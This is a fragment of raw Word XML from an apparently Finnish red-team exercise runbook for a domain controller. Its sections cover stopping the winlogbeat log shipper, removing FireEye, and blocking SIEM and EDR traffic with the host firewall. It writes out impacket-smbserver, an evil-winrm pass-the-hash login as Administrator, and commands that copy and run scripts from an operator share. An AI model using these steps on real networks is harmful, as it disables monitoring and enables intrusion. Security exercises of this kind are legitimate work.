        </w:rPr>
        <w:t xml:space="preserve"> write_to_hosts.ps1 tiedostoa</w:t>
      </w:r>
      <w:r w:rsidR="007C528B">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> on mahdollista määrittää, mitä hosts tiedostoon kirjoitetaan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F0C736" w14:textId="0D3B2C1E" w:rsidR="007C528B" w:rsidRDefault="00F66E3C" w:rsidP="002834B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003354E5">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Kopio dc kone</w:t>
      </w:r>
      <w:r w:rsidR="004704A5">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>lle tarvittavat tiedostot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91BBCB" w14:textId="60522D40" w:rsidR="004704A5" w:rsidRPr="003E5917" w:rsidRDefault="004704A5" w:rsidP="004704A5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5917"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>Copy-Item \\server ip]\[share name]\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EE43D" w14:textId="40CBF894" w:rsidR="00F767AB" w:rsidRPr="00C5129F" w:rsidRDefault="005A5378" w:rsidP="004704A5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ja aja komento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C2838" w14:textId="56036A12" w:rsidR="005A5378" w:rsidRPr="002E1F27" w:rsidRDefault="007A70B3" w:rsidP="004704A5">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="007A70B3"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  <w:t>Start-Job -FilePath</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> .\</w:t>
      </w:r>
      <w:r w:rsidR="005A5378" w:rsidRPr="002E1F27"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  <w:t>new-task-hosts.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03DBF7" w14:textId="24F46462" w:rsidR="00F767AB" w:rsidRPr="00F767AB" w:rsidRDefault="00F767AB" w:rsidP="004704A5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F767AB">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBBC58A" wp14:editId="1DB43CE1">
            <wp:extent cx="6435588" cy="1233488"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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3310" cy="12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ED69" w14:textId="77777777" w:rsidR="004704A5" w:rsidRPr="004704A5" w:rsidRDefault="004704A5" w:rsidP="002834B9"/>
    <w:p w14:paraId="7AA64458" w14:textId="0D21BE39" w:rsidR="00F66E3C" w:rsidRPr="004704A5" w:rsidRDefault="00F66E3C" w:rsidP="002834B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEF7AE8" w14:textId="77777777" w:rsidR="00F66E3C" w:rsidRPr="004704A5" w:rsidRDefault="00F66E3C" w:rsidP="002834B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084186F4" w14:textId="7D6941BF" w:rsidR="00BB2AD9" w:rsidRPr="003354E5" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc131534307"/>
      <w:r w:rsidRPr="003354E5">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>BP - DC - Impact - Service Stop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4A0C2882" w14:textId="1131E7C8" w:rsidR="00715FEF" w:rsidRPr="009C7681" w:rsidRDefault="00715FEF" w:rsidP="00715FEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715FEF">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tämä blueprint poistaa käytöstä winlogbeat s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">ervicen </w:t>
      </w:r>
      <w:r w:rsidR="00C96A87">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>ja poistaa fireeyen</w:t>
      </w:r>
      <w:r w:rsidR="009C7681">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C7681" w:rsidRPr="009C7681">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tätä voidaan</w:t>
      </w:r>
      <w:r w:rsidR="009C7681">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> vielä harkita, olisiko järkevämpää tehd</w:t>
      </w:r>
      <w:r w:rsidR="00AA49E1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>ä</w:t>
      </w:r>
      <w:r w:rsidR="009C7681">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO:lla?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF0AC1" w14:textId="75ED8647" w:rsidR="00C96A87" w:rsidRPr="000551E3" w:rsidRDefault="00C96A87" w:rsidP="00C96A87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000551E3">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Hae teamssistä tiedosto “</w:t>
      </w:r>
      <w:r w:rsidR="000551E3" w:rsidRPr="000551E3">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>new-task-visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="000551E3">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>.ps1” ja “</w:t>
      </w:r>
      <w:r w:rsidR="000551E3" w:rsidRPr="000551E3">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>remove_visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="000551E3">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>.ps1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DEB76" w14:textId="77777777" w:rsidR="00FE2C40" w:rsidRDefault="00FE2C40" w:rsidP="00FE2C40">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Kopio dc koneelle tarvittavat tiedostot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BEDDD1" w14:textId="77777777" w:rsidR="00FE2C40" w:rsidRPr="003E5917" w:rsidRDefault="00FE2C40" w:rsidP="00FE2C40">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5917">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Copy-Item \\server ip]\[share name]\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A508480" w14:textId="77777777" w:rsidR="00FE2C40" w:rsidRPr="00C5129F" w:rsidRDefault="00FE2C40" w:rsidP="00FE2C40">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ja aja komento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF7F9B7" w14:textId="305F4F21" w:rsidR="00FE2C40" w:rsidRPr="007A70B3" w:rsidRDefault="007A70B3" w:rsidP="00FE2C40">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="007A70B3"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  <w:t xml:space="preserve">Start-Job -FilePath </w:t>
      </w:r>
      <w:r w:rsidR="00FE2C40" w:rsidRPr="007A70B3"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  <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="00904AE0" w:rsidRPr="007A70B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00904AE0" w:rsidRPr="007A70B3">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ew-task-visibility.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC2F65" w14:textId="2131B036" w:rsidR="00904AE0" w:rsidRDefault="0028016E" w:rsidP="00FE2C40">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/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01878CBD" wp14:editId="11E7483F">
            <wp:extent cx="6417712" cy="885825"/>
            <wp:effectExtent l="0" t="0" r="254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1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A686" w14:textId="77777777" w:rsidR="00231267" w:rsidRDefault="00231267" w:rsidP="00607350">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E02A83" w14:textId="77777777" w:rsidR="00231267" w:rsidRDefault="00231267" w:rsidP="00231267">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc131534308"/>
      <w:r w:rsidRPr="00231267">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>BP - DC - Defense Evasion - Impair Defenses Disable or Modify System Firewall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="53F15361" w14:textId="2F882AD6" w:rsidR="00607350" w:rsidRPr="00231267" w:rsidRDefault="00607350" w:rsidP="00607350">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231267">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tämä group policy estää palomuurilla SIEM ja EDR palvelimiin liikennöin host palomuurilla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C188B6C" w14:textId="2518DC25" w:rsidR="00607350" w:rsidRPr="00D01335" w:rsidRDefault="00607350" w:rsidP="00607350">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01335">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Hae teamssistä tiedosto “</w:t>
      </w:r>
      <w:r w:rsidR="00D01335" w:rsidRPr="00D01335">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>fw-block-gpo.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01335">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>” ja “</w:t>
      </w:r>
      <w:r w:rsidR="00D01335" w:rsidRPr="00D01335">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>fw-block.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01335">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1BC068" w14:textId="4E4F6DAD" w:rsidR="00607350" w:rsidRDefault="00607350" w:rsidP="00607350">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582F6634" w14:textId="2D70C95C" w:rsidR="00D01335" w:rsidRPr="00D01335" w:rsidRDefault="00D01335" w:rsidP="00607350">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Kopio dc koneelle tarvittavat tiedostot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1D851" w14:textId="77777777" w:rsidR="00607350" w:rsidRPr="00C5129F" w:rsidRDefault="00607350" w:rsidP="00D0133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fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>impacket-smbserver [share-name] .</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="scxw99972573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  <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9013F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536D19BE" wp14:editId="1B8176ED">
            <wp:extent cx="5382704" cy="2371725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33" cy="2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82E" w14:textId="77777777" w:rsidR="00D01335" w:rsidRPr="00C5129F" w:rsidRDefault="00D01335" w:rsidP="00D013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</w:pPr>
    </w:p>
    <w:p w14:paraId="64346AD9" w14:textId="588DFB1E" w:rsidR="00607350" w:rsidRPr="00C5129F" w:rsidRDefault="00D01335" w:rsidP="00D0133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fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F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  <w:t>Yhdistä dc koneelle evil-winrm:llä</w:t>
      </w:r>
      <w:r w:rsidR="00607350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="scxw99972573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  <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00607350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00607350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>evil-winrm -i [dc-fqdn] -u Administrator -H [NTLM hash]</w:t>
      </w:r>
      <w:r w:rsidR="00607350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="scxw99972573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  <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00607350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00607350">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BC20F6" wp14:editId="5C49666A">
            <wp:extent cx="4962028" cy="21228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028" cy="21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350" w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68815E50" w14:textId="77777777" w:rsidR="00D01335" w:rsidRPr="00C5129F" w:rsidRDefault="00D01335" w:rsidP="00D013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</w:pPr>
    </w:p>
    <w:p w14:paraId="49F3F55A" w14:textId="03DFC630" w:rsidR="00607350" w:rsidRPr="00D01335" w:rsidRDefault="4797B2C7" w:rsidP="10872EA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fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="10872EA9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  <w:t>Laitaa tarvittavat tiedost dc koneelle</w:t>
      </w:r>
      <w:r w:rsidR="32ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="scxw99972573"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D01335">
        <w:br/>
      </w:r>
      <w:r w:rsidR="32ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy-Item </w:t>
      </w:r>
      <w:r w:rsidR="32ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidR="32ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>server ip]\[share name]\*</w:t>
      </w:r>
      <w:r w:rsidR="32ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="scxw99972573"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D01335">
        <w:br/>
      </w:r>
      <w:r w:rsidR="32ECF9E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EAE3AD" wp14:editId="10872EA9">
            <wp:extent cx="5503961" cy="1404938"/>
            <wp:effectExtent l="0" t="0" r="1905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961" cy="14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ECF9E0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="5CEAF9B9" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D01335">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F185477" w14:textId="77777777" w:rsidR="00607350" w:rsidRDefault="00607350" w:rsidP="00D0133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22E66D4F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</w:rPr>
        <w:t>Run the scrtipt</w:t>
      </w:r>
      <w:r w:rsidRPr="22E66D4F">
        <w:rPr>
          <w:rStyle w:val="scxw99972573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>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="22E66D4F"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>./</w:t>
      </w:r>
      <w:r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>fw-block</w:t>
      </w:r>
      <w:r w:rsidRPr="22E66D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.ps1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0021697D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9EFF0CB" wp14:editId="34F59BF3">
            <wp:extent cx="5314950" cy="3605571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0842" cy="36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B8A0" w14:textId="0781AFBF" w:rsidR="00AA0161" w:rsidRPr="00607350" w:rsidRDefault="00AA0161" w:rsidP="00FE2C40">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAB14AF" w14:textId="2EC43634" w:rsidR="69265941" w:rsidRPr="00607350" w:rsidRDefault="69265941" w:rsidP="69265941">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2357E6" w14:textId="75CDB754" w:rsidR="69265941" w:rsidRPr="00607350" w:rsidRDefault="69265941" w:rsidP="69265941">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441EC079" w14:textId="7C3AD079" w:rsidR="00AA0161" w:rsidRDefault="00AA0161" w:rsidP="00AA0161">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc131534309"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Sliver implant</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="775CA27F" w14:textId="5BC9080E" w:rsidR="00AA0161" w:rsidRPr="00AA0161" w:rsidRDefault="00AA0161" w:rsidP="00AA0161">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>tulossa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480289B5" w14:textId="77777777" w:rsidR="00C96A87" w:rsidRPr="00FE2C40" w:rsidRDefault="00C96A87" w:rsidP="00715FEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C96A87" w:rsidRPr="00FE2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9A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1FA5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30A34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D26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070AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0370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65BE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04A47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A372B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57D4B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0D325A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C19E4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41473"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="717E6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233571">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1935357037">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="29308966">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2029092007">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1591428739">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1669602634">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1451314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A6"/>
    <w:rsid w:val="000101CC"/>
    <w:rsid w:val="000551E3"/>
    <w:rsid w:val="00072BA2"/>
    <w:rsid w:val="000A540A"/>
    <w:rsid w:val="000B2534"/>
    <w:rsid w:val="000C4FD9"/>
    <w:rsid w:val="000D2CB5"/>
    <w:rsid w:val="000D55DA"/>
    <w:rsid w:val="000E331C"/>
    <w:rsid w:val="001266C2"/>
    <w:rsid w:val="00136365"/>
    <w:rsid w:val="00157F0B"/>
